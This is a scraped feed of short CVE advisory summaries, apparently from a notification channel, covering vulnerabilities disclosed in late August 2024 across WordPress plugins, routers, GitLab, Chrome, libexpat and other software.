🚨 CVE-2024-37954Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in marcelotorres Simple Responsive Slider allows Reflected XSS.This issue affects Simple Responsive Slider: from n/a through 0.2.2.5.🎖@cveNotify |
|
| 2024-08-30 16:07:42 |
🚨 CVE-2024-29726SQL injection vulnerabilities in SportsNET affecting version 4.0.1. These vulnerabilities could allow an attacker to retrieve, update and delete all information in the database by sending a specially crafted SQL query: https://XXXXXXX.saludydesafio.com/app/ax/setAsRead/, parameter id.🎖@cveNotify |
|
| 2024-08-30 16:07:41 |
🚨 CVE-2024-29723SQL injection vulnerabilities in SportsNET affecting version 4.0.1. These vulnerabilities could allow an attacker to retrieve, update and delete all information in the database by sending a specially crafted SQL query: https://XXXXXXX.saludydesafio.com/conexiones/ax/openTracExt/, parameter categoria;.🎖@cveNotify |
|
| 2024-08-30 16:07:37 |
🚨 CVE-2024-41918'Rakuten Ichiba App' for Android 12.4.0 and earlier and 'Rakuten Ichiba App' for iOS 11.7.0 and earlier are vulnerable to improper authorization in handler for custom URL scheme. An arbitrary site may be displayed on the WebView of the product via Intent from another application installed on the user's device. As a result, the user may be redirected to an unauthorized site, and the user may become a victim of a phishing attack.🎖@cveNotify |
|
| 2024-08-30 16:07:36 |
🚨 CVE-2024-8193Heap buffer overflow in Skia in Google Chrome prior to 128.0.6613.113 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-30 16:07:35 |
🚨 CVE-2024-44760Incorrect access control in the component /servlet/SnoopServlet of Shenzhou News Union Enterprise Management System v5.0 through v18.8 allows attackers to access sensitive information regarding the server.🎖@cveNotify |
|
| 2024-08-30 16:07:32 |
🚨 CVE-2024-43805jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture. This vulnerability depends on user interaction by opening a malicious notebook with Markdown cells, or Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab v3.6.8, v4.2.5 and Jupyter Notebook v7.2.2 have been patched to resolve this issue. Users are advised to upgrade. There is no workaround for the underlying DOM Clobbering susceptibility. However, select plugins can be disabled on deployments which cannot update in a timely fashion to minimise the risk. These are: 1. `@jupyterlab/mathjax-extension:plugin` - users will loose ability to preview mathematical equations. 2. `@jupyterlab/markdownviewer-extension:plugin` - users will loose ability to open Markdown previews. 3. `@jupyterlab/mathjax2-extension:plugin` (if installed with optional `jupyterlab-mathjax2` package) - an older version of the mathjax plugin for JupyterLab 4.x. To disable these extensions run: ```jupyter labextension disable @jupyterlab/markdownviewer-extension:plugin && jupyter labextension disable @jupyterlab/mathjax-extension:plugin && jupyter labextension disable @jupyterlab/mathjax2-extension:plugin ``` in bash.🎖@cveNotify |
|
| 2024-08-30 16:07:31 |
🚨 CVE-2024-34195TOTOLINK AC1200 Wireless Router A3002R Firmware V1.1.1-B20200824 is vulnerable to Buffer Overflow. In the boa server program's CGI handling function formWlEncrypt, there is a lack of length restriction on the wlan_ssid field. This oversight leads to potential buffer overflow under specific circumstances. For instance, by invoking the formWlanRedirect function with specific parameters to alter wlan_idx's value and subsequently invoking the formWlEncrypt function, an attacker can trigger buffer overflow, enabling arbitrary command execution or denial of service attacks.🎖@cveNotify |
|
| 2024-08-30 16:07:30 |
🚨 CVE-2024-44915An issue in the component EXR!ReadEXR+0x4eef0 of Irfanview v4.67.1.0 allows attackers to cause an access violation via a crafted EXR file. This vulnerability can lead to a Denial of Service (DoS).🎖@cveNotify |
|
| 2024-08-30 16:07:26 |
🚨 CVE-2024-44913An issue in the component EXR!ReadEXR+0x40ef1 of Irfanview v4.67.1.0 allows attackers to cause an access violation via a crafted EXR file. This vulnerability can lead to a Denial of Service (DoS).🎖@cveNotify |
|
| 2024-08-30 16:07:25 |
🚨 CVE-2024-39713A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.🎖@cveNotify |
|
| 2024-08-30 16:07:24 |
🚨 CVE-2024-4341Improper Privilege Management vulnerability in Ekstrem Bir Bilgisayar Danismanlik Ic Ve Dis Ticaret Ltd. Sti. Extreme XDS allows Collect Data as Provided by Users.This issue affects Extreme XDS: before 3928.🎖@cveNotify |
|
| 2024-08-30 15:07:30 |
🚨 CVE-2024-8199The Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_api_key' function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update API Key options.🎖@cveNotify |
|
| 2024-08-30 15:07:26 |
🚨 CVE-2024-45264A cross-site request forgery (CSRF) vulnerability in the admin panel in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to add a new administrator, leading to escalation of privileges.🎖@cveNotify |
|
| 2024-08-30 15:07:25 |
🚨 CVE-2024-44340D-Link DIR-846W A1 FW100A43 was discovered to contain a remote command execution (RCE) vulnerability via keys smartqos_express_devices and smartqos_normal_devices in SetSmartQoSSettings.🎖@cveNotify |
|
| 2024-08-30 15:07:24 |
🚨 CVE-2024-41622D-Link DIR-846W A1 FW100A43 was discovered to contain a remote command execution (RCE) vulnerability via the tomography_ping_address parameter in /HNAP1/ interface.🎖@cveNotify |
|
| 2024-08-30 14:37:42 |
🚨 CVE-2024-41346openflights commit 5234b5b is vulnerable to Cross-Site Scripting (XSS) via php/submit.php🎖@cveNotify |
|
| 2024-08-30 14:37:41 |
🚨 CVE-2024-6633The default credentials for the setup HSQL database (HSQLDB) for FileCatalyst Workflow are published in a vendor knowledgebase article. Misuse of these credentials could lead to a compromise of confidentiality, integrity, or availability of the software.The HSQLDB is only included to facilitate installation, has been deprecated, and is not intended for production use per vendor guides. However, users who have not configured FileCatalyst Workflow to use an alternative database per recommendations are vulnerable to attack from any source that can reach the HSQLDB.🎖@cveNotify |
|
| 2024-08-30 14:37:38 |
🚨 CVE-2024-5651A flaw was found in the Fence Agents Remediation operator. This vulnerability can allow a Remote Code Execution (RCE) primitive by supplying an arbitrary command to execute in the --ssh-path/--telnet-path arguments. A low-privilege user, for example, a user with developer access, can create a specially crafted FenceAgentsRemediation for a fence agent supporting --ssh-path/--telnet-path arguments to execute arbitrary commands on the operator's pod. This RCE leads to a privilege escalation, first as the service account running the operator, then to another service account with cluster-admin privileges.🎖@cveNotify |
|
| 2024-08-30 14:37:37 |
🚨 CVE-2024-6595An issue was discovered in GitLab CE/EE affecting all versions starting from 11.8 prior to 16.11.6, starting from 17.0 prior to 17.0.4, and starting from 17.1 prior to 17.1.2 where it was possible to upload an NPM package with conflicting package data.🎖@cveNotify |
|
| 2024-08-30 14:37:36 |
🚨 CVE-2024-6323Improper authorization in global search in GitLab EE affecting all versions from 16.11 prior to 16.11.5 and 17.0 prior to 17.0.3 and 17.1 prior to 17.1.1 allows an attacker leak content of a private repository in a public project.🎖@cveNotify |
|
| 2024-08-30 14:37:32 |
🚨 CVE-2024-1493An issue was discovered in GitLab CE/EE affecting all versions starting from 9.2 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, with the processing logic for generating link in dependency files can lead to a regular expression DoS attack on the server🎖@cveNotify |
|
| 2024-08-30 14:37:31 |
🚨 CVE-2024-5469DoS in KAS in GitLab CE/EE affecting all versions from 16.10.0 prior to 16.10.6 and 16.11.0 prior to 16.11.3 allows an attacker to crash KAS via crafted gRPC requests.🎖@cveNotify |
|
| 2024-08-30 14:07:30 |
🚨 CVE-2024-7071Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), CWE - 564 - SQL Injection: Hibernate vulnerability in Brain Information Technologies Inc. Brain Low-Code allows SQL Injection.This issue affects Brain Low-Code: before 2.1.0.🎖@cveNotify |
|
| 2024-08-30 14:07:26 |
🚨 CVE-2024-8181An Authentication Bypass vulnerability exists in Flowise version 1.8.2. This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality.🎖@cveNotify |
|
| 2024-08-30 14:07:25 |
🚨 CVE-2024-6212A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as problematic. Affected by this issue is the function get_student of the file student_form.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269276.🎖@cveNotify |
|
| 2024-08-30 14:07:24 |
🚨 CVE-2023-2414The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_settings_callback function in versions up to, and including, 4.4.6. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to modify the plugins settings, upload arbitrary files, and inject malicious JavaScript (before 4.3.2).🎖@cveNotify |
|
| 2024-08-30 13:37:30 |
🚨 CVE-2024-8334A vulnerability was found in master-nan Sweet-CMS up to 5f441e022b8876f07cde709c77b5be6d2f262e3f. It has been rated as problematic. This issue affects the function LogHandler of the file middleware/log.go. The manipulation leads to improper output neutralization for logs. The attack may be initiated remotely. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 2024c370e6c78b07b358c9d4257fa5d1be732c38. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-08-30 13:37:26 |
🚨 CVE-2024-8207In certain highly specific configurations of the host system and MongoDB server binary installation on Linux Operating Systems, it may be possible for a unintended actor with host-level access to cause the MongoDB Server binary to load unintended actor-controlled shared libraries when the server binary is started, potentially resulting in the unintended actor gaining full control over the MongoDB server process. This issue affects MongoDB Server v5.0 versions prior to 5.0.14 and MongoDB Server v6.0 versions prior to 6.0.3.Required Configuration: Only environments with Linux as the underlying operating system is affected by this issue🎖@cveNotify |
|
| 2024-08-30 13:37:25 |
🚨 CVE-2024-0881The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not have proper authorization, resulting in password protected posts to be displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts🎖@cveNotify |
|
| 2024-08-30 13:37:24 |
🚨 CVE-2024-0421The MapPress Maps for WordPress plugin before 2.88.16 is affected by an IDOR as it does not ensure that posts to be retrieve via an AJAX action is a public map, allowing unauthenticated users to read arbitrary private and draft posts.🎖@cveNotify |
|
| 2024-08-30 13:07:26 |
🚨 CVE-2024-6650A vulnerability was found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0 and classified as problematic. Affected by this issue is the function save_designation of the file /classes/Master.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-271058 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-30 13:07:25 |
🚨 CVE-2024-38561In the Linux kernel, the following vulnerability has been resolved:kunit: Fix kthread referenceThere is a race condition when a kthread finishes after the deadline andbefore the call to kthread_stop(), which may lead to use after free.🎖@cveNotify |
|
| 2024-08-30 12:37:24 |
🚨 CVE-2024-8332A vulnerability was found in master-nan Sweet-CMS up to 5f441e022b8876f07cde709c77b5be6d2f262e3f. It has been declared as critical. This vulnerability affects unknown code of the file /table/index. The manipulation leads to sql injection. The attack can be initiated remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 146359646a5a90cb09156dbd0013b7df77f2aa6c. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-08-30 11:37:25 |
🚨 CVE-2024-8331A vulnerability was found in OpenRapid RapidCMS up to 1.3.1. It has been classified as critical. This affects an unknown part of the file /admin/user/user-move-run.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-30 11:37:24 |
🚨 CVE-2022-48944In the Linux kernel, the following vulnerability has been resolved:sched: Fix yet more sched_fork() racesWhere commit 4ef0c5c6b5ba ("kernel/sched: Fix sched_fork() access aninvalid sched_task_group") fixed a fork race vs cgroup, it opened up arace vs syscalls by not placing the task on the runqueue before itgets exposed through the pidhash.Commit 13765de8148f ("sched/fair: Fix fault in reweight_entity") istrying to fix a single instance of this, instead fix the whole classof issues, effectively reverting this commit.🎖@cveNotify |
|
| 2024-08-30 10:37:26 |
🚨 CVE-2024-8274The WP Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters from 'timeline_obj' in all versions up to, and including, 10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-30 10:37:25 |
🚨 CVE-2024-7122The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.13.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-30 10:37:24 |
🚨 CVE-2023-7164The BackWPup WordPress plugin before 4.0.4 does not prevent Directory Listing in its temporary backup folder, allowing unauthenticated attackers to download backups of a site's database.🎖@cveNotify |
|
| 2024-08-30 09:37:24 |
🚨 CVE-2023-3345The LMS by Masteriyo WordPress plugin before 1.6.8 does not have proper authorization in one some of its REST API endpoints, making it possible for any students to retrieve email addresses of other students🎖@cveNotify |
|
| 2024-08-30 08:37:25 |
🚨 CVE-2023-6257The Inline Related Posts WordPress plugin before 3.6.0 is missing authorization in an AJAX action to ensure that users are allowed to see the content of the posts displayed, allowing any authenticated user, such as subscriber to retrieve the content of password protected posts🎖@cveNotify |
|
| 2024-08-30 08:37:24 |
🚨 CVE-2023-6821The Error Log Viewer by BestWebSoft WordPress plugin before 1.1.3 is affected by a Directory Listing issue, allowing users to read and download PHP logs without authorization🎖@cveNotify |
|
| 2024-08-30 07:37:25 |
🚨 CVE-2024-39300Missing authentication vulnerability exists in Telnet function of WAB-I1750-PS v1.5.10 and earlier. When Telnet function of the product is enabled, a remote attacker may login to the product without authentication and alter the product's settings.🎖@cveNotify |
|
| 2024-08-30 07:37:24 |
🚨 CVE-2024-34577Cross-site scripting vulnerability exists in WRC-X3000GS2-B, WRC-X3000GS2-W, and WRC-X3000GS2A-B due to improper processing of input values in easysetup.cgi. If a user views a malicious web page while logged in to the product, an arbitrary script may be executed on the user's web browser.🎖@cveNotify |
|
| 2024-08-30 05:37:25 |
🚨 CVE-2024-3998The Betheme theme for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes in all versions up to, and including, 27.5.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-30 05:37:24 |
🚨 CVE-2024-2694The Betheme theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 27.5.6 via deserialization of untrusted input of the 'mfn-page-items' post meta value. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-08-30 04:37:25 |
🚨 CVE-2024-5024The Memberpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mepr_screenname' and 'mepr_key' parameter in all versions up to, and including, 1.11.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-30 04:37:24 |
🚨 CVE-2024-4401The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ and 'eae_slider_animation' parameters in all versions up to, and including, 1.13.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-30 03:37:30 |
🚨 CVE-2024-83296SHR system from Gether Technology does not properly validate the specific page parameter, allowing remote attackers with regular privilege to inject SQL command to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-08-30 03:37:26 |
🚨 CVE-2024-8327Easy testOnline Learning and Testing Platform from HWA JIUH DIGITAL TECHNOLOGY does not properly validate a specific page parameter, allowing remote attackers with regular privilege to inject arbitrary SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-08-30 03:37:25 |
🚨 CVE-2024-45491An issue was discovered in libexpat before 2.6.3. dtdCopy in xmlparse.c can have an integer overflow for nDefaultAtts on 32-bit platforms (where UINT_MAX equals SIZE_MAX).🎖@cveNotify |
|
| 2024-08-30 03:37:24 |
🚨 CVE-2024-45490An issue was discovered in libexpat before 2.6.3. xmlparse.c does not reject a negative length for XML_ParseBuffer.🎖@cveNotify |
|
| 2024-08-30 02:37:24 |
🚨 CVE-2024-45488One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.🎖@cveNotify |
|
| 2024-08-30 01:37:24 |
🚨 CVE-2024-8234** UNSUPPORTED WHEN ASSIGNED ** A command injection vulnerability in the functions formSysCmd(), formUpgradeCert(), and formDelcert() in the Zyxel NWA1100-N firmware version 1.00(AACE.1)C0 could allow an unauthenticated attacker to execute some OS commands to access system files on an affected device.🎖@cveNotify |
|
| 2024-08-30 00:38:01 |
🚨 CVE-2024-41918'Rakuten Ichiba App' for Android 12.4.0 and earlier and 'Rakuten Ichiba App' for iOS 11.7.0 and earlier are vulnerable to improper authorization in handler for custom URL scheme. An arbitrary site may be displayed on the WebView of the product via Intent from another application installed on the user's device. As a result, the user may be redirected to an unauthorized site, and the user may become a victim of a phishing attack.🎖@cveNotify |
|
| 2024-08-29 22:37:32 |
🚨 CVE-2024-6671In WhatsUp Gold versions released before 2024.0.0, if the application is configured with only a single user, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.🎖@cveNotify |
|
| 2024-08-29 22:37:26 |
🚨 CVE-2024-6670In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.🎖@cveNotify |
|
| 2024-08-29 22:37:25 |
🚨 CVE-2024-38438D-Link - CWE-294: Authentication Bypass by Capture-replay🎖@cveNotify |
|
| 2024-08-29 22:37:24 |
🚨 CVE-2024-38437D-Link - CWE-288:Authentication Bypass Using an Alternate Path or Channel🎖@cveNotify |
|
| 2024-08-29 22:07:33 |
🚨 CVE-2024-38208Microsoft Edge for Android Spoofing Vulnerability🎖@cveNotify |
|
| 2024-08-29 22:07:26 |
🚨 CVE-2024-8078A vulnerability was found in TOTOLINK AC1200 T8 4.1.5cu.862_B20230228. It has been declared as critical. This vulnerability affects the function setTracerouteCfg. The manipulation leads to buffer overflow. The attack can be initiated remotely. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-29 22:07:25 |
🚨 CVE-2024-8075A vulnerability has been found in TOTOLINK AC1200 T8 4.1.5cu.862_B20230228 and classified as critical. Affected by this vulnerability is the function setDiagnosisCfg. The manipulation leads to os command injection. The attack can be launched remotely. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-29 21:37:26 |
🚨 CVE-2022-47894Improper Input Validation vulnerability in Apache Zeppelin SAP.This issue affects Apache Zeppelin SAP: from 0.8.0 before 0.11.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.For more information, the fix already was merged in the source code but Zeppelin decided to retire the SAP componentNOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-29 21:37:25 |
🚨 CVE-2024-22603FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/links/add_link🎖@cveNotify |
|
| 2024-08-29 21:37:24 |
🚨 CVE-2023-5553During internal Axis Security Development Model (ASDM) threat-modelling, a flaw was found in the protection for device tampering (commonly known as Secure Boot) in AXIS OS making it vulnerable to a sophisticated attack to bypass this protection. To Axis' knowledge, there are no known exploits of the vulnerability at this time. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2024-08-29 21:07:24 |
🚨 CVE-2024-35711Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Theme Freesia Event allows Stored XSS.This issue affects Event: from n/a through 1.2.2.🎖@cveNotify |
|
| 2024-08-29 20:37:44 |
🚨 CVE-2024-21674This High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server.Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.6 and a CVSS Vector of CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N allows an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, no impact to integrity, no impact to availability, and does not require user interaction.Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:* Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release* Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release* Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher releaseSee the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ).🎖@cveNotify |
|
| 2024-08-29 20:37:37 |
🚨 CVE-2023-47392An access control issue in Mercedes me IOS APP v1.34.0 and below allows attackers to view the carts of other users via sending a crafted add order request.🎖@cveNotify |
|
| 2024-08-29 20:37:36 |
🚨 CVE-2023-48111Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow via the time parameter in the function saveParentControlInfo . This vulnerability allows attackers to cause a Denial of Service (DoS) attack🎖@cveNotify |
|
| 2024-08-29 20:37:32 |
🚨 CVE-2023-48031OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type. In the comment function, an attacker can bypass security restrictions and upload a .bat file by manipulating the file's magic bytes to masquerade as an allowed type. This can enable the attacker to execute arbitrary code or establish a reverse shell, leading to unauthorized file writes or control over the victim's station via a crafted file upload operation.🎖@cveNotify |
|
| 2024-08-29 20:37:31 |
🚨 CVE-2023-48089xxl-job-admin 2.4.0 is vulnerable to Remote Code Execution (RCE) via /xxl-job-admin/jobcode/save.🎖@cveNotify |
|
| 2024-08-29 20:37:26 |
🚨 CVE-2023-39337A security vulnerability in EPMM Versions 11.10, 11.9 and 11.8 older allows a threat actor with knowledge of an enrolled device identifier to access and extract sensitive information, including device and environment configuration details, as well as secrets. This vulnerability poses a serious security risk, potentially exposing confidential data and system integrity.🎖@cveNotify |
|
| 2024-08-29 20:37:25 |
🚨 CVE-2023-35352Windows Remote Desktop Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-08-29 20:07:24 |
🚨 CVE-2024-5866Vulnerability in Delinea Centrify PAS v. 21.3 and possibly others. The application is prone to the path traversal vulnerability allowing listing of arbitrary directory outside the root directory of the web application. Versions 23.1-HF7 and on have the patch.🎖@cveNotify |
|
| 2024-08-29 19:37:35 |
🚨 CVE-2024-43947Cross-Site Request Forgery (CSRF) vulnerability in Dinesh Karki WP Armour Extended.This issue affects WP Armour Extended: from n/a through 1.26.🎖@cveNotify |
|
| 2024-08-29 19:37:32 |
🚨 CVE-2024-43921Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Magic Post Thumbnail allows Reflected XSS.This issue affects Magic Post Thumbnail: from n/a through 5.2.9.🎖@cveNotify |
|
| 2024-08-29 19:37:31 |
🚨 CVE-2024-39593SAP Landscape Management allows an authenticateduser to read confidential data disclosed by the REST Provider Definitionresponse. Successful exploitation can cause high impact on confidentiality ofthe managed entities.🎖@cveNotify |
|
| 2024-08-29 19:37:30 |
🚨 CVE-2024-37174Custom CSS support option in SAP CRM WebClientUI does not sufficiently encode user-controlled inputs resulting in Cross-SiteScripting vulnerability. On successful exploitation an attacker can causelimited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2024-08-29 19:37:26 |
🚨 CVE-2024-4708mySCADA myPRO uses a hard-coded password which could allow an attacker to remotely execute code on the affected device.🎖@cveNotify |
|
| 2024-08-29 19:37:25 |
🚨 CVE-2024-3727A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.🎖@cveNotify |
|
| 2024-08-29 19:37:24 |
🚨 CVE-2023-6717A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.🎖@cveNotify |
|
| 2024-08-29 19:07:35 |
🚨 CVE-2024-37934Improper Control of Generation of Code ('Code Injection') vulnerability in Saturday Drive Ninja Forms allows Code Injection.This issue affects Ninja Forms: from n/a through 3.8.4.🎖@cveNotify |
|
| 2024-08-29 19:07:31 |
🚨 CVE-2024-37454Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AWSM Innovations AWSM Team allows Path Traversal.This issue affects AWSM Team: from n/a through 1.3.1.🎖@cveNotify |
|
| 2024-08-29 19:07:30 |
🚨 CVE-2024-37437Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Elementor Elementor Website Builder allows Cross-Site Scripting (XSS), Stored XSS.This issue affects Elementor Website Builder: from n/a through 3.22.1.🎖@cveNotify |
|
| 2024-08-29 19:07:26 |
🚨 CVE-2024-37410Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Beaver Addons PowerPack Lite for Beaver Builder allows Path Traversal.This issue affects PowerPack Lite for Beaver Builder: from n/a through 1.3.0.3.🎖@cveNotify |
|
| 2024-08-29 19:07:25 |
🚨 CVE-2024-37266Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Themeum Tutor LMS allows Path Traversal.This issue affects Tutor LMS: from n/a through 2.7.1.🎖@cveNotify |
|
| 2024-08-29 19:07:24 |
🚨 CVE-2024-39598SAP CRM (WebClient UI Framework) allows anauthenticated attacker to enumerate accessible HTTP endpoints in the internalnetwork by specially crafting HTTP requests. On successful exploitation thiscan result in information disclosure. It has no impact on integrity andavailability of the application.🎖@cveNotify |
|
| 2024-08-29 18:07:32 |
🚨 CVE-2024-7540oFono AT CMGL Command Uninitialized Variable Information Disclosure Vulnerability. This vulnerability allows local attackers to disclose sensitive information on affected installations of oFono. An attacker must first obtain the ability to execute code on the target modem in order to exploit this vulnerability.The specific flaw exists within the parsing of responses from AT+CMGL commands. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-23307.🎖@cveNotify |
|
| 2024-08-29 18:07:26 |
🚨 CVE-2024-7539oFono CUSD Stack-based Buffer Overflow Code Execution Vulnerability. This vulnerability allows local attackers to execute arbitrary code on affected installations of oFono. An attacker must first obtain the ability to execute code on the target modem in order to exploit this vulnerability.The specific flaw exists within the parsing of responses from AT+CUSD commands. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-23195.🎖@cveNotify |
|
| 2024-08-29 18:07:25 |
🚨 CVE-2024-39676Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Pinot.This issue affects Apache Pinot: from 0.1 before 1.0.0.Users are recommended to upgrade to version 1.0.0 and configure RBAC, which fixes the issue.Details: When using a request to path “/appconfigs” to the controller, it can lead to the disclosure of sensitive information such as system information (e.g. arch, os version), environment information (e.g. maxHeapSize) and Pinot configurations (e.g. zookeeper path). This issue was addressed by the Role-based Access Control https://docs.pinot.apache.org/operators/tutorials/authentication/basic-auth-access-control , so that /appConfigs` and all other APIs can be access controlled. Only authorized users have access to it. Note the user needs to add the admin role accordingly to the RBAC guide to control access to this endpoint, and in the future version of Pinot, a default admin role is planned to be added.🎖@cveNotify |
|
| 2024-08-29 18:07:24 |
🚨 CVE-2024-39880Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process.🎖@cveNotify |
|
| 2024-08-29 17:07:26 |
🚨 CVE-2024-39751IBM InfoSphere Information Server 11.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 297429🎖@cveNotify |
|
| 2024-08-29 17:07:25 |
🚨 CVE-2024-35705Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Ciprian Popescu Block for Font Awesome allows Stored XSS.This issue affects Block for Font Awesome: from n/a through 1.4.4.🎖@cveNotify |
|
| 2024-08-29 17:07:24 |
🚨 CVE-2024-35704Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPBlockArt BlockArt Blocks allows Stored XSS.This issue affects BlockArt Blocks: from n/a through 2.1.5.🎖@cveNotify |
|
| 2024-08-29 16:37:32 |
